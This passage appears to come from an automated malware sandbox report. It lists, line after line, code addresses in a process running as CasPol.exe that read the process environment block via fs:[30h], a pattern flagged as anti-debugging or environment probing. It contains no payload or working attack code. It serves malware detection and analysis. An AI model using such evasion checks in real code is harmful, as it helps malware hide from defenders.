          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]1_2_013E61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]1_2_013E61A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014441E8 mov eax, dword ptr fs:[00000030h]1_2_014441E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2990 mov eax, dword ptr fs:[00000030h]1_2_013E2990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EA185 mov eax, dword ptr fs:[00000030h]1_2_013EA185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DC182 mov eax, dword ptr fs:[00000030h]1_2_013DC182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]1_2_013BB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]1_2_014749A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014369A6 mov eax, dword ptr fs:[00000030h]1_2_014369A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]1_2_014351BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]1_2_013DA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]1_2_013E002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]1_2_013CB02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472073 mov eax, dword ptr fs:[00000030h]1_2_01472073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01481074 mov eax, dword ptr fs:[00000030h]1_2_01481074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]1_2_01437016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]1_2_01437016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]1_2_01437016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]1_2_01484015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]1_2_01484015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]1_2_013D0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]1_2_013D0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EF0BF mov ecx, dword ptr fs:[00000030h]1_2_013EF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]1_2_013EF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]1_2_013EF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F90AF mov eax, dword ptr fs:[00000030h]1_2_013F90AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]1_2_0144B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]1_2_013E20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9080 mov eax, dword ptr fs:[00000030h]1_2_013B9080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]1_2_01433884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]1_2_01433884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B58EC mov eax, dword ptr fs:[00000030h]1_2_013B58EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]1_2_013DB8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]1_2_013DB8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]1_2_013B40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]1_2_013B40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]1_2_013B40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01488B58 mov eax, dword ptr fs:[00000030h]1_2_01488B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]1_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]1_2_013E3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]1_2_013E3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BDB60 mov ecx, dword ptr fs:[00000030h]1_2_013BDB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147131B mov eax, dword ptr fs:[00000030h]1_2_0147131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BF358 mov eax, dword ptr fs:[00000030h]1_2_013BF358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BDB40 mov eax, dword ptr fs:[00000030h]1_2_013BDB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]1_2_014353CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]1_2_014353CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]1_2_013E4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]1_2_013E4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]1_2_013E4BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]1_2_014623E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]1_2_014623E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014623E3 mov eax, dword ptr fs:[00000030h]1_2_014623E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2397 mov eax, dword ptr fs:[00000030h]1_2_013E2397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EB390 mov eax, dword ptr fs:[00000030h]1_2_013EB390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]1_2_013C1B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]1_2_013C1B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]1_2_013E138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]1_2_013E138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]1_2_013E138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0146D380 mov ecx, dword ptr fs:[00000030h]1_2_0146D380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147138A mov eax, dword ptr fs:[00000030h]1_2_0147138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DDBE9 mov eax, dword ptr fs:[00000030h]1_2_013DDBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01485BA5 mov eax, dword ptr fs:[00000030h]1_2_01485BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147EA55 mov eax, dword ptr fs:[00000030h]1_2_0147EA55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01444257 mov eax, dword ptr fs:[00000030h]1_2_01444257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]1_2_013F4A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]1_2_013F4A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D3A1C mov eax, dword ptr fs:[00000030h]1_2_013D3A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]1_2_0146B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]1_2_0146B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01488A62 mov eax, dword ptr fs:[00000030h]1_2_01488A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B5210 mov ecx, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]1_2_013BAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]1_2_013BAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C8A0A mov eax, dword ptr fs:[00000030h]1_2_013C8A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F927A mov eax, dword ptr fs:[00000030h]1_2_013F927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]1_2_0147AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]1_2_0147AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]1_2_013CAAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]1_2_013CAAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EFAB0 mov eax, dword ptr fs:[00000030h]1_2_013EFAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
